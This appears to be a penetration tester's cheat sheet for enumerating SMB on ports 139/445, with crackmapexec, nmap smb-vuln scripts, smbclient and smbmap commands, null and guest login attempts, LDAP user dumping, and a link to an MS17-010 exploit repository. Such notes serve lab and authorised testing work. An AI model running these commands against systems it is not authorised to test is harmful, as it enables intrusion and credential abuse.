139/445 - SMB

What all I do, when I see 139/445 Open:

1. Find SMB Version: tcpdump -i tun0 port <Victim Port> and src <Victim IP> -s0 -A -n 2>/dev/null & crackmapexec smb <Victim IP> --shares --port <Victim Port> 1>/dev/null 2>/dev/null

2. Nmap Scan: nmap --script "safe or smb-enum-*" -p 445 <IP>

3. Shares: smbclient -L \\\\<IP>\\

4. Changing Shares: smbclient -L \\\\<IP>\\C$

5. Lists file with permissions: smbmap -H <IP>

6. Downloading: smbget -R smb://<IP>/anonymous

7. type prompt off, recurse on -> lets us download all the files using mget *

8. Nmap Vuln Script: nmap --script "smb-vuln*" -p 139,445 <IP>

9. crackmapexec smb <IP>

10. Users: crackmapexec smb <IP> --users

11. Shares: crackmapexec smb <IP> --shares

12. Try Crackmapexec, psexec, smbexec, wmiexec

If we have Username and password:

1. Authenticated SMB Shares: smbclient \\\new-site -U <domain_name\username>

2. Null login: crackmapexec smb <IP> --shares -u ' ' -p ''

3. Null login: crackmapexec smb <IP> --shares -u '' -p ''

4. Null login: crackmapexec smb <IP> -u ' ' -p ''

5. Default Guest login: crackmapexec smb <IP> -u 'guest' -p ''

6. LDAP search: ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h <IP> | grep -i samaccountname: | cut -f 2 -d " "

7. Auth Check: crackmapexec smb <IP> -u <user> -p <pass> --local-auth

8. Auth Check: crackmapexec smb <IP> -u <user> -p <pass>

SMB Enumeration Guide - Steflan's Security BlogSteflan's Security Blog

GitHub - 3ndG4me/AutoBlue-MS17-010: This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010GitHub